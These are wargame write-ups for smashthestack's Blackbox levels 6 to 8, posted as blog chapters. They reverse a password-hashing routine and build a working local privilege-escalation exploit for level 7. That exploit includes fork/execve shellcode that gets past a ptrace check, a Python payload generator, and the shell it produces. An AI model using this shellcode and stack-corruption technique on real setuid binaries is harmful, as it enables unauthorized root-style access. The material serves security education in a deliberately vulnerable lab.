080484DD  0FB610            movzx edx,byte [eax]
080484E0  0FB601            movzx eax,byte [ecx]
080484E3  28D0              sub al,dl
080484E5  045A              add al,0x5a
080484E7  8803              mov [ebx],al
080484E9  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080484EF  FF00              inc dword [eax]
080484F1  EBA5              jmp short 0x8048498

What happens here is this, and you can verify it yourself:

var_418[var_41c] = var_10[var_41c + 1] - var_10[var_41c] + 0x5a;
var_41c++;

This tells us several things:

var_41c is some sort of index, from now on we will call it idx.
var_418 is some temporary buffer in the stack, we'll call it buf.
var_10, which was returned from the prompt function, is a pointer to some input, most probably the user input, and the the prompt function is a prompt-and-read function. We will call it input.

At the end of that section, there's a jump to 0x8048498 which we will call label3. We've already been there, it's the piece that contained the mystery function. Let's rewrite it, but with more meaningful names and see if it sheds some new light:

if (idx >= (func(input) - 1)) goto label1
else if (idx <= 0x3fb) goto label2
else goto label1

I think we can spots what's happening here, mystery function func is actually strlen, and this is part of a while statement:

while ((idx < strlen(input)) && (idx <= 0x3fb)) {
    buf[idx] = input[idx + 1] - input[idx] + 0x5a;
    idx++;
}
/* do label1 stuff */

OK, let's see what happens at label1 (I'm going to start annotating the code with variable names):

label1:
080484F3  8D85E8FBFFFF      lea eax,[buf]
080484F9  89C2              mov edx,eax
080484FB  0395E4FBFFFF      add edx,[idx]
08048501  8B85E4FBFFFF      mov eax,[idx]
08048507  0345F0            add eax,[input]
0804850A  0FB600            movzx eax,byte [eax]
0804850D  C0F804            sar al,0x4
08048510  240F              and al,0xf
08048512  0421              add al,0x21
08048514  8802              mov [edx],al

This translates to:

buf[idx] = 0x21 + (input[idx] >> 4) & 0xf;

The next chunk:

08048516  8D85E9FBFFFF      lea eax,[buf+1]
0804851C  89C2              mov edx,eax
0804851E  0395E4FBFFFF      add edx,[idx]
08048524  8B85E4FBFFFF      mov eax,[idx]
0804852A  0345F0            add eax,[input]
0804852D  0FB600            movzx eax,byte [eax]
08048530  240F              and al,0xf
08048532  0421              add al,0x21
08048534  8802              mov [edx],al

Which translates to:

buf[idx + 1] = 0x21 + input[idx] & 0xf;

Next we have:

08048536  8D85EAFBFFFF      lea eax,[buf+2]
0804853C  0385E4FBFFFF      add eax,[idx]
08048542  C60000            mov byte [eax],0x0
08048545  C785E4FBFFFF0000  mov dword [idx],0x0
         -0000

This is equivalent to:

buf[idx + 2] = 0;
idx = 0;

This looks like something string-like was terminated, and the index was reset, probably for a second pass. Let's see what happens next:

0804854F  8D85E8FBFFFF      lea eax,[buf]
08048555  890424            mov [esp],eax
08048558  E80BFEFFFF        call dword 0x8048368 [strlen]
0804855D  48                dec eax
0804855E  3985E4FBFFFF      cmp [idx],eax
08048564  7205              jc 0x804856b [label4]
08048566  E99B000000        jmp dword 0x8048606 [label5]

Translated to C:

if (idx < strlen(buf) - 1) goto label4;
else goto label5;

The next piece of code starts at label4, and has a repeating pattern, so I'll paste it all at once:

label4:
0804856B  8D85E8FBFFFF      lea eax,[buf]
08048571  89C1              mov ecx,eax
08048573  038DE4FBFFFF      add ecx,[idx]
08048579  8D85E8FBFFFF      lea eax,[buf]
0804857F  89C2              mov edx,eax
08048581  0395E4FBFFFF      add edx,[idx]
08048587  8D85E9FBFFFF      lea eax,[buf+1]
0804858D  0385E4FBFFFF      add eax,[idx]
08048593  0FB600            movzx eax,byte [eax]
08048596  3202              xor al,[edx]
08048598  8801              mov [ecx],al
0804859A  8D85E9FBFFFF      lea eax,[buf+1]
080485A0  89C1              mov ecx,eax
080485A2  038DE4FBFFFF      add ecx,[idx]
080485A8  8D85E9FBFFFF      lea eax,[buf+1]
080485AE  89C2              mov edx,eax
080485B0  0395E4FBFFFF      add edx,[idx]
080485B6  8D85E8FBFFFF      lea eax,[buf]
080485BC  0385E4FBFFFF      add eax,[idx]
080485C2  0FB600            movzx eax,byte [eax]
080485C5  3202              xor al,[edx]
080485C7  8801              mov [ecx],al
080485C9  8D85E8FBFFFF      lea eax,[buf]
080485CF  89C1              mov ecx,eax
080485D1  038DE4FBFFFF      add ecx,[idx]
080485D7  8D85E8FBFFFF      lea eax,[buf]
080485DD  89C2              mov edx,eax
080485DF  0395E4FBFFFF      add edx,[idx]
080485E5  8D85E9FBFFFF      lea eax,[buf+1]
080485EB  0385E4FBFFFF      add eax,[idx]
080485F1  0FB600            movzx eax,byte [eax]
080485F4  3202              xor al,[edx]
080485F6  8801              mov [ecx],al

Which is:

buf[idx] = buf[idx] ^ buf[idx + 1];
buf[idx + 1] = buf[idx] ^ buf[idx + 1];
buf[idx] = buf[idx] ^ buf[idx + 1];

That's just the code for swapping bytes.
Next we have:

080485F8  8D85E4FBFFFF      lea eax,[idx]
080485FE  830002            add dword [eax],byte +0x2
08048601  E949FFFFFF        jmp dword 0x804854f

Which increments the index by 2 and then jumps back to the index comparison, which makes it look like another loop:

for (idx = 0; i < strlen(buf) - 1; i += 2) {
    buf[idx] = buf[idx] ^ buf[idx + 1];
    buf[idx + 1] = buf[idx] ^ buf[idx + 1];
    buf[idx] = buf[idx] ^ buf[idx + 1];
}

Next is the code that gets executed when the loop is exhausted:

label5:
08048606  8D95E8FBFFFF      lea edx,[buf]
0804860C  8B45F4            mov eax,[gibberish]
0804860F  89442404          mov [esp+0x4],eax
08048613  891424            mov [esp],edx
08048616  E81DFDFFFF        call dword 0x8048338
0804861B  85C0              test eax,eax
0804861D  751A              jnz 0x8048639

I think by this time you figured out what's happening here, gibberish is a password hash, and the the program did so far is to hash the input password, and this is where they get compared.
I won't continue analyzing the code anymore, because that's enough. Let's combine all the little pieces of C code and see what we can do:

while ((idx < strlen(input)) && (idx <= 0x3fb)) {
    buf[idx] = input[idx + 1] - input[idx] + 0x5a;
    idx++;
}

buf[idx] = 0x21 + (input[idx] >> 4) & 0xf;
buf[idx + 1] = 0x21 + input[idx] & 0xf;
buf[idx + 2] = 0;

for (idx = 0; i < strlen(buf) - 1; i += 2) {
    buf[idx] = buf[idx] ^ buf[idx + 1];
    buf[idx + 1] = buf[idx] ^ buf[idx + 1];
    buf[idx] = buf[idx] ^ buf[idx + 1];
}

Well, we know the hash, and we know the hashed password. We can now perform an inverse hash and obtain the original password.
That should be easy, working backwards:

Unswap every two consecutive bytes in the hash.
Take the last two bytes, subtract 0x21 from them, and recombine them to a single byte, one being the high nibble, and the other the low nibble. Now we know input[N]
Reversing the formula for buf inside the while we can obtain a regression formula for the input: input[i] = input[i + 1] - buf[i] + 0x5a.

I think I'll leave it to you to write a script and obtain the password yourselves.
I'll check check if it works:

level8@blackbox:~$ ./secrets
Please enter your password: 
Welcome
sh-3.1$

Just one last level to go ;)

Blackbox - chapter 7

$ ssh -p 2225 level7@blackbox.smashthestack.org
level7@blackbox.smashthestack.org's password:
...
level7@blackbox:~$ ls -l
total 12
-rwsr-xr-x 1 level8 level8 7851 2008-04-21 18:26 heybabe
-rw-r--r-- 1 root   level7   10 2008-01-24 05:56 passwd

No source, so like the previous time, let's start with dumping the data:

level7@blackbox:~$ objdump -s --section=.rodata heybabe

heybabe:     file format elf32-i386

Contents of section .rodata:
 80486b0 03000000 01000200 75736167 653a2025  ........usage: %
 80486c0 73203c61 72673e0a 00000000 54726163  s <arg>.....Trac
 80486d0 696e6720 64657465 63746564 203a2920  ing detected :) 
 80486e0 736f7272 79202e2e 2e2e2e00 544f5547  sorry ......TOUG
 80486f0 48205348 49542100 57616c6b 20746865  H SHIT!.Walk the
 8048700 20776179 206f6620 74686520 31333337   way of the 1337
 8048710 206f6e65 2100                         one!.

As before, I've colored the strings, and made a summary:

80486b8: usage : %s <arg>\n
80486cc: Tracing detected :) sorry .....
80486ec: TOUGH SHIT!
80486f8: Walk the way of the 1337 one!

Now we'll disassemble main:

level7@blackbox:~$ objdump -d heybabe|grep -A80 "<main>:"
08048464 <main>:
 8048464: 8d 4c 24 04           lea    0x4(%esp),%ecx
 8048468: 83 e4 f0              and    $0xfffffff0,%esp
 804846b: ff 71 fc              pushl  0xfffffffc(%ecx)
 804846e: 55                    push   %ebp
 804846f: 89 e5                 mov    %esp,%ebp
 8048471: 57                    push   %edi
 8048472: 51                    push   %ecx
 8048473: 81 ec 10 04 00 00     sub    $0x410,%esp
 8048479: 89 8d 04 fc ff ff     mov    %ecx,0xfffffc04(%ebp)
 804847f: 8b 85 04 fc ff ff     mov    0xfffffc04(%ebp),%eax
 8048485: 83 38 02              cmpl   $0x2,(%eax)
 8048488: 74 27                 je     80484b1 <main+0x4d>
 804848a: 8b 95 04 fc ff ff     mov    0xfffffc04(%ebp),%edx
 8048490: 8b 42 04              mov    0x4(%edx),%eax
 8048493: 8b 00                 mov    (%eax),%eax
 8048495: 89 44 24 04           mov    %eax,0x4(%esp)
 8048499: c7 04 24 b8 86 04 08  movl   $0x80486b8,(%esp)
 80484a0: e8 cf fe ff ff        call   8048374 <printf@plt>
 80484a5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ac: e8 d3 fe ff ff        call   8048384 <exit@plt>
 80484b1: c7 44 24 0c 00 00 00  movl   $0x0,0xc(%esp)
 80484b8: 00 
 80484b9: c7 44 24 08 01 00 00  movl   $0x1,0x8(%esp)
 80484c0: 00 
 80484c1: c7 44 24 04 00 00 00  movl   $0x0,0x4(%esp)
 80484c8: 00 
 80484c9: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 80484d0: e8 7f fe ff ff        call   8048354 <ptrace@plt>
 80484d5: 85 c0                 test   %eax,%eax
 80484d7: 79 18                 jns    80484f1 <main+0x8d>
 80484d9: c7 04 24 cc 86 04 08  movl   $0x80486cc,(%esp)
 80484e0: e8 5f fe ff ff        call   8048344 <puts@plt>
 80484e5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ec: e8 93 fe ff ff        call   8048384 <exit@plt>
 80484f1: 8b bd 04 fc ff ff     mov    0xfffffc04(%ebp),%edi
 80484f7: 8b 47 04              mov    0x4(%edi),%eax
 80484fa: 83 c0 04              add    $0x4,%eax
 80484fd: 8b 00                 mov    (%eax),%eax
 80484ff: c7 44 24 08 e7 03 00  movl   $0x3e7,0x8(%esp)
 8048506: 00 
 8048507: 89 44 24 04           mov    %eax,0x4(%esp)
 804850b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048511: 89 04 24              mov    %eax,(%esp)
 8048514: e8 7b fe ff ff        call   8048394 <strncpy@plt>
 8048519: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 804851f: b9 ff ff ff ff        mov    $0xffffffff,%ecx
 8048524: 89 85 00 fc ff ff     mov    %eax,0xfffffc00(%ebp)
 804852a: b0 00                 mov    $0x0,%al
 804852c: fc                    cld    
 804852d: 8b bd 00 fc ff ff     mov    0xfffffc00(%ebp),%edi
 8048533: f2 ae                 repnz scas %es:(%edi),%al
 8048535: 89 c8                 mov    %ecx,%eax
 8048537: f7 d0                 not    %eax
 8048539: 48                    dec    %eax
 804853a: 40                    inc    %eax
 804853b: c6 84 05 10 fc ff ff  movb   $0x0,0xfffffc10(%ebp,%eax,1)
 8048542: 00 
 8048543: c7 44 24 04 24 00 00  movl   $0x24,0x4(%esp)
 804854a: 00 
 804854b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048551: 89 04 24              mov    %eax,(%esp)
 8048554: e8 db fd ff ff        call   8048334 <strchr@plt>
 8048559: 85 c0                 test   %eax,%eax
 804855b: 74 18                 je     8048575 <main+0x111>
 804855d: c7 04 24 ec 86 04 08  movl   $0x80486ec,(%esp)
 8048564: e8 0b fe ff ff        call   8048374 <printf@plt>
 8048569: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 8048570: e8 0f fe ff ff        call   8048384 <exit@plt>
 8048575: c7 04 24 f8 86 04 08  movl   $0x80486f8,(%esp)
 804857c: e8 f3 fd ff ff        call   8048374 <printf@plt>
 8048581: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048587: 89 04 24              mov    %eax,(%esp)
 804858a: e8 e5 fd ff ff        call   8048374 <printf@plt>
 804858f: b8 00 00 00 00        mov    $0x0,%eax
 8048594: 81 c4 10 04 00 00     add    $0x410,%esp
 804859a: 59                    pop    %ecx
 804859b: 5f                    pop    %edi
 804859c: 5d                    pop    %ebp
 804859d: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80485a0: c3                    ret

The first few lines, up to the cmpl & je should be familiar (if not, see the previous chapter for a detailed description) and mean first, that the address to the arguments is stored at ebp-0x3fc, and second, that the program expects exactly one argument.

The next lines are somewhat more tricky and important to this level:

 80484b1: c7 44 24 0c 00 00 00  movl   $0x0,0xc(%esp)
 80484b8: 00 
 80484b9: c7 44 24 08 01 00 00  movl   $0x1,0x8(%esp)
 80484c0: 00 
 80484c1: c7 44 24 04 00 00 00  movl   $0x0,0x4(%esp)
 80484c8: 00 
 80484c9: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 80484d0: e8 7f fe ff ff        call   8048354 <ptrace@plt>
 80484d5: 85 c0                 test   %eax,%eax
 80484d7: 79 18                 jns    80484f1 <main+0x8d>

The called function is ptrace, and it is called with the following parameters: ptrace(0, 0, 1, 0). Then the return value is tested to be 0, and a jump is performed accordingly.
Now, what is this ptrace, what are the arguments, and why is it crucial for this level.
Well, ptrace is a system call, and we can find some documentation about it in the man pages (cropped for brevity and relevance, you can find the full man-pages by invoking man ptrace):

PTRACE(2)                 Linux Programmer's Manual                 PTRACE(2)

NAME
       ptrace - process trace

SYNOPSIS
       #include 

       long ptrace(enum __ptrace_request request, pid_t pid,
                   void *addr, void *data);

DESCRIPTION
       The  ptrace()  system  call provides a means by which a parent process
       may observe and control the execution of another process, and  examine
       and  change  its  core  image  and registers.  It is primarily used to
       implement breakpoint debugging and system call tracing.

       The parent can initiate a trace by  calling  fork(2)  and  having  the
       resulting  child  do  a  PTRACE_TRACEME,  followed  (typically)  by an
       exec(3).  Alternatively, the parent may commence trace of an  existing
       process using PTRACE_ATTACH.  (See additional notes below.)
...
       The value of request determines the action to be performed:

       PTRACE_TRACEME
              Indicates that this process is to be traced by its parent.  Any
              signal (except SIGKILL) delivered to this process will cause it
              to  stop  and its parent to be notified via wait(2).  Also, all
              subsequent calls to execve(2) by this process will cause a SIG‐
              TRAP  to be sent to it, giving the parent a chance to gain con‐
              trol before the new program begins execution.  A process proba‐
              bly  shouldn't  make this request if its parent isn't expecting
              to trace it.  (pid, addr, and data are ignored.)

       The above request is used only by the child process; the rest are used
       only  by  the  parent.   In  the following requests, pid specifies the
       child process to be acted on.  For requests  other  than  PTRACE_KILL,
       the child process must be stopped.
...
RETURN VALUE
       On  success,  PTRACE_PEEK*  requests  return the requested data, while
       other requests return zero.  On error, all  requests  return  -1,  and
       errno  is set appropriately.  Since the value returned by a successful
       PTRACE_PEEK* request may be -1, the caller must check errno after such
       requests to determine whether or not an error occurred.
...

OK, what can we learn from the man pages:

The ptrace system-call receives 4 parameters: a request code, a pid, an address pointer and a data pointer.
The request code used in our case is 0, which corresponds to PTRACE_TRACEME. What this request does is make the process behave in a traceable fashion, which involves, among other things, making it stop before any call to execve. Also, all the rest of the arguments are ignored.
The function returns -1 on failure.

So, in our case, ptrace fails, it will return -1, trigger the sign flag, which means that the jump branch will not be taken and we go to:

 80484d9: c7 04 24 cc 86 04 08  movl   $0x80486cc,(%esp)
 80484e0: e8 5f fe ff ff        call   8048344 <puts@plt>
 80484e5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ec: e8 93 fe ff ff        call   8048384 <exit@plt>

That's just an error print and an exit.
When will it fail? Well, if the process is already marked as being traced, then ptrace will fail, it will happen if we try to debug the program by running it in gdb. This can be averted by setting a breakpoint before the test instruction and changing the value of eax so that the test will pass. This is not important for this level, but it's good to know.
The real important thing is, that since the process is in trace mode, we can't execute a shellcode that has an execve system call in it.
Bear that in mind as we continue to analyze the program.

 80484f1: 8b bd 04 fc ff ff     mov    0xfffffc04(%ebp),%edi
 80484f7: 8b 47 04              mov    0x4(%edi),%eax
 80484fa: 83 c0 04              add    $0x4,%eax
 80484fd: 8b 00                 mov    (%eax),%eax

This just loads eax with the address of argv[1] (again, should be familiar from the previous chapter).

 80484ff: c7 44 24 08 e7 03 00  movl   $0x3e7,0x8(%esp)
 8048506: 00 
 8048507: 89 44 24 04           mov    %eax,0x4(%esp)
 804850b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048511: 89 04 24              mov    %eax,(%esp)
 8048514: e8 7b fe ff ff        call   8048394 <strncpy@plt>

Now, this is a call to a safe strncpy with the destination being ebp-0x3f0, which we will call from now on buf, the source being argv[1] and the maximum size limit being 0x3e7.
The next piece of code is a bit tricky:

 8048519: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 804851f: b9 ff ff ff ff        mov    $0xffffffff,%ecx
 8048524: 89 85 00 fc ff ff     mov    %eax,0xfffffc00(%ebp)
 804852a: b0 00                 mov    $0x0,%al
 804852c: fc                    cld    
 804852d: 8b bd 00 fc ff ff     mov    0xfffffc00(%ebp),%edi
 8048533: f2 ae                 repnz scas %es:(%edi),%al
 8048535: 89 c8                 mov    %ecx,%eax
 8048537: f7 d0                 not    %eax
 8048539: 48                    dec    %eax

This is basically an inline implementation of strlen with buf as the argument. For a more in depth explanation of how this works you can check out this article. Bottom line, eax now contains the length of buf, which is the number of bytes until the first string terminator.
However, and this is important, there is an interesting point about strncpy, and that is that if the source string is longer than the limit, it will not terminate the string at the destination. This means that buf will not necessarily have a string terminator inside it, and then strlen will keep searching up the rest of the stack for a 0x00.

 804853a: 40                    inc    %eax
 804853b: c6 84 05 10 fc ff ff  movb   $0x0,0xfffffc10(%ebp,%eax,1)
 8048542: 00

This puts a string terminator after the end of buf.

 8048543: c7 44 24 04 24 00 00  movl   $0x24,0x4(%esp)
 804854a: 00 
 804854b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048551: 89 04 24              mov    %eax,(%esp)
 8048554: e8 db fd ff ff        call   8048334 <strchr@plt>
 8048559: 85 c0                 test   %eax,%eax
 804855b: 74 18                 je     8048575 <main+0x111>

This performs a search on buf for the character '$'=0x24 using strchr, which if successful, returns some non-0 pointer to the character, or NULL on failure.
If the search is successful, i.e. we have a '$' in our buffer, we are turned towards:

 804855d: c7 04 24 ec 86 04 08  movl   $0x80486ec,(%esp)
 8048564: e8 0b fe ff ff        call   8048374 <printf@plt>
 8048569: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 8048570: e8 0f fe ff ff        call   8048384 <exit@plt>

This prints a message and exits. This is important since this path does not lead to a return from main.
If we do not have a '$' in buf, we go to:

 804857c: e8 f3 fd ff ff        call   8048374 
 8048581: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048587: 89 04 24              mov    %eax,(%esp)
 804858a: e8 e5 fd ff ff        call   8048374 <printf@plt>
 804858f: b8 00 00 00 00        mov    $0x0,%eax
 8048594: 81 c4 10 04 00 00     add    $0x410,%esp
 804859a: 59                    pop    %ecx
 804859b: 5f                    pop    %edi
 804859c: 5d                    pop    %ebp
 804859d: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80485a0: c3                    ret

Which contains a return from main.
Now, here I'd like to discuss the last few lines of code in detail. The thing is, that when ret is executed, it pops whatever esp points to, and jumps there.
Notice that before the return, esp is loaded with ecx-4, while ecx is popped from the stack.
Before we continue, I just want to sketch the stack:

Now suppose this scenario:

We supply a very long, yet to be determined, argument to the program.
The important thing is that we want ecx to be 0xbfff0100.
This will make strlen stop when it reaches the LSB of the stored ecx, which means that a new 0x00 byte will be written on the second byte of the stored ecx, resulting in 0xbfff0000, which is an address 256 bytes lower than the original ecx.
That address is actually an address inside buf.
When at the end of main, that address (-4) will be loaded into esp, we can make sure that it contains the address of the bottom of buf.
The bottom of buf itself will contain a shellcode.

So, let's analyze how ecx might be affected. First, let's see what's its value is without any arguments:

level7@blackbox:~$ gdb heybabe
GNU gdb 6.4.90-debian
...
(gdb) b main
Breakpoint 1 at 0x8048473
(gdb) run
Starting program: /home/level7/heybabe 

Breakpoint 1, 0x08048473 in main ()
(gdb) x/a $ebp-8
0xbfffda80:	0xbfffdaa0

We would like that to be 0xbfff0100. So let's try with an argument 0xbfffdaa0-0xbfff0100=0xd9a0 bytes long:

(gdb) run `python -c "print 'a'*0xd9a0"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/level7/heybabe `python -c "print 'a'*0xd9a0"`

Breakpoint 1, 0x08048473 in main ()
(gdb) x/a $ebp-8
0xbfff00e0:	0xbfff0100

Good. You can also see that ebp-8=0xbfff00e0 so ebp=0xbfff00e8.
This means that the tampered ecx will point to ebp-0xe8. So, 4 bytes blow that, at ebp-0xec, we should prepare the address ebp-0x3f0=0xbffefcf8.

Now that we have the structure of the payload figured out, we need to figure out the payload.

Remember that the call to ptrace with PTRACE_TRACEME will make the process stop before any call to execve.
How can we circumvent that? Well, the ptrace is active only on the process that called it, so if we were to fork, the child process will not be traced, and can do whatever it wants without any limitations.
So what the shellcode needs to do is fork, the child should call execve, and the parent should wait for the child (this way we can interact with the shell and not cause it to just run in the background).
We want out shellcode to be the equivalent of the following C code:

pid = fork();
if (pid == 0) {
    execve(...);
} else {
    wait(NULL);
}

We have already worked out the code for the execve in the second chapter. Let's figure out the other two.
Instead of disassembling fork, I'll disassemble vfork, because fork under libc does not use the fork system call, but rather clone (look in notes of the fork man pages).

(gdb) disas vfork
Dump of assembler code for function vfork:
0x00c6f950 :	pop    %ecx
0x00c6f951 :	mov    %gs:0x4c,%edx
0x00c6f958 :	mov    %edx,%eax
0x00c6f95a :	neg    %eax
0x00c6f95c :	jne    0xc6f963 
0x00c6f95e :	mov    $0x80000000,%eax
0x00c6f963 :	mov    %eax,%gs:0x4c
0x00c6f969 :	mov    $0xbe,%eax
0x00c6f96e :	int    $0x80
...

Now for wait. The thing is, wait is not a system call by itself, wait4 is. The prototype for wait4 is:

pid_t wait4(pid_t pid, int *status, int options, struct rusage *rusage);

So wait(NULL) is equivalent to wait4(-1, NULL, 0, NULL) . Using a pid of -1 means it waits for any child process (from the man page of waitpid).
The disassembly of wait4's wrapper is:

(gdb) disas wait4
Dump of assembler code for function wait4:
0x00c6ef70 :	push   %esi
0x00c6ef71 :	push   %ebx
0x00c6ef72 :	mov    0x18(%esp),%esi
0x00c6ef76 :	mov    0x14(%esp),%edx
0x00c6ef7a :	mov    0x10(%esp),%ecx
0x00c6ef7e :	mov    0xc(%esp),%ebx
0x00c6ef82 :	mov    $0x72,%eax
0x00c6ef87 :	int    $0x80
...

So let's write our shellcode and try it out. I've written it with ptrace in the beginning so we can make sure it works under the same constraints as it would in the exploit.

level7@blackbox:/tmp$ cat &gt; shellcode7.c
#include <sys/ptrace.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    int pid;
    pid = getpid();
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    __asm__(
        "xorl %eax,%eax\n\t"
        "movb $0xbe,%al\n\t"
        "int $0x80\n\t"
        "test %eax,%eax\n\t"
        "je child\n\t"
        "xorl %eax,%eax\n\t"
        "xorl %ebx,%ebx\n\t"
        "dec %ebx\n\t"
        "xorl %ecx,%ecx\n\t"
        "xorl %edx,%edx\n\t"
        "xorl %esi,%esi\n\t"
        "movb $0x72,%al\n\t"
        "int $0x80\n"
        "child:\n\t"
        "xorl  %eax,%eax\n\t"
        "pushl %eax\n\t"
        "pushl $0x68732f2f\n\t"
        "pushl $0x6e69622f\n\t"
        "movl  %esp, %ebx\n\t"
        "pushl %eax\n\t"
        "pushl %ebx\n\t"
        "movl  %esp, %ecx\n\t"
        "xorl  %edx, %edx\n\t"
        "movb  $0x0b, %al\n\t"
        "int $0x80"
    );
    return 0;
}

level7@blackbox:/tmp$ gcc -o shellcode7 shellcode7.c
level7@blackbox:/tmp$ ./shellcode7
sh-3.1$

It works.
Let's extract the raw code, and embed it in a script:

level7@blackbox:/tmp$ cat &gt; gen7.py
import struct

SHELLCODE = "31c0b0becd8085c0740f31c031db4b31c931d231f6b072cd8031c050682f2f7368682f62696
e89e3505389e131d2b00bcd80".decode("hex")
BUF = 0xbffefcf8

ARG = SHELLCODE
ARG += 'X' * (0x3f0 - 0xec - len(ARG))
ARG += struct.pack("ARG += 'X' * (0xd9a0 - len(ARG))

print ARG

Show time:

level7@blackbox:~$ ~/heybabe `python /tmp/gen7.py`
Walk the way of the 1337 one!1���̀��t1�1�K1�1�1��r̀1�Ph//shh/bin��PS��1Ұ
                                                                      XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX����XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXsh-3.1$ 
sh-3.1$ cat /home/level8/password
????????????

On to the next level (sorry for the spam there, but that IS the output)

Friday, January 27, 2012

Blackbox - chapter 6

Also, make sure you notice this SPOILER ALERT! If you want to try and solve the level by yourself then read no further!

Level 6. You should know the drill by now:

$ ssh -p 2225 level6@blackbox.smashthestack.org
level6@blackbox.smashthestack.org's password:
...
level6@blackbox:~$ ls -l
total 16
-rwsr-xr-x 1 level7 level7 7599 2008-01-24 05:09 fsp
-rw-r--r-- 1 root   level6   13 2007-12-29 14:10 password
-rw-r--r-- 1 root   root     32 2008-01-24 05:04 temp

Ah...no source file this time. Well, looks like we will have to make do with what we have.
Usually we start of with a disassembly of the .text section, but this time, I'd like to start off with the .rodata section because we will need it to better understand the disassembled code:

level6@blackbox:~$ objdump -s --section=.rodata fsp

fsp:     file format elf32-i386

Contents of section .rodata:
 8048610 03000000 01000200 75736167 65203a20  ........usage : 
 8048620 2573203c 61726775 6d656e74 3e0a0061  %s <argument>..a
 8048630 0074656d 70006e6f 20736567 6661756c  .temp.no segfaul
 8048640 74207965 740a00                      t yet..

Here, I've even colored the relevant strings. Let's just make a little summary of addresses and the strings they contain:

8048618: usage : %s <argument>
804862f: a
8048631: temp
8048636: no segfault yet

Now we'll disassemble main from the .text section, and I'll go ahead annotate the places with the above addresses:

level6@blackbox:~$ objdump -d fsp|grep -A49 "<main>:"
08048444 <main>:
 8048444: 8d 4c 24 04           lea    0x4(%esp),%ecx
 8048448: 83 e4 f0              and    $0xfffffff0,%esp
 804844b: ff 71 fc              pushl  0xfffffffc(%ecx)
 804844e: 55                    push   %ebp
 804844f: 89 e5                 mov    %esp,%ebp
 8048451: 51                    push   %ecx
 8048452: 81 ec 34 04 00 00     sub    $0x434,%esp
 8048458: 89 8d d8 fb ff ff     mov    %ecx,0xfffffbd8(%ebp)
 804845e: a1 36 86 04 08        mov    0x8048636,%eax          ;"no segfault yet"
 8048463: 89 45 e7              mov    %eax,0xffffffe7(%ebp)
 8048466: a1 3a 86 04 08        mov    0x804863a,%eax          ;"egfault yet"
 804846b: 89 45 eb              mov    %eax,0xffffffeb(%ebp)
 804846e: a1 3e 86 04 08        mov    0x804863e,%eax          ;"ult yet"
 8048473: 89 45 ef              mov    %eax,0xffffffef(%ebp)
 8048476: a1 42 86 04 08        mov    0x8048642,%eax          ;"yet"
 804847b: 89 45 f3              mov    %eax,0xfffffff3(%ebp)
 804847e: 0f b6 05 46 86 04 08  movzbl 0x8048646,%eax          ;"\0"
 8048485: 88 45 f7              mov    %al,0xfffffff7(%ebp)
 8048488: 8b 85 d8 fb ff ff     mov    0xfffffbd8(%ebp),%eax
 804848e: 83 38 01              cmpl   $0x1,(%eax)
 8048491: 7f 27                 jg     80484ba <main+0x76>
 8048493: 8b 95 d8 fb ff ff     mov    0xfffffbd8(%ebp),%edx
 8048499: 8b 42 04              mov    0x4(%edx),%eax
 804849c: 8b 00                 mov    (%eax),%eax
 804849e: 89 44 24 04           mov    %eax,0x4(%esp)
 80484a2: c7 04 24 18 86 04 08  movl   $0x8048618,(%esp)       ;"usage : %s <argument>"
 80484a9: e8 9a fe ff ff        call   8048348 <printf@plt>
 80484ae: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
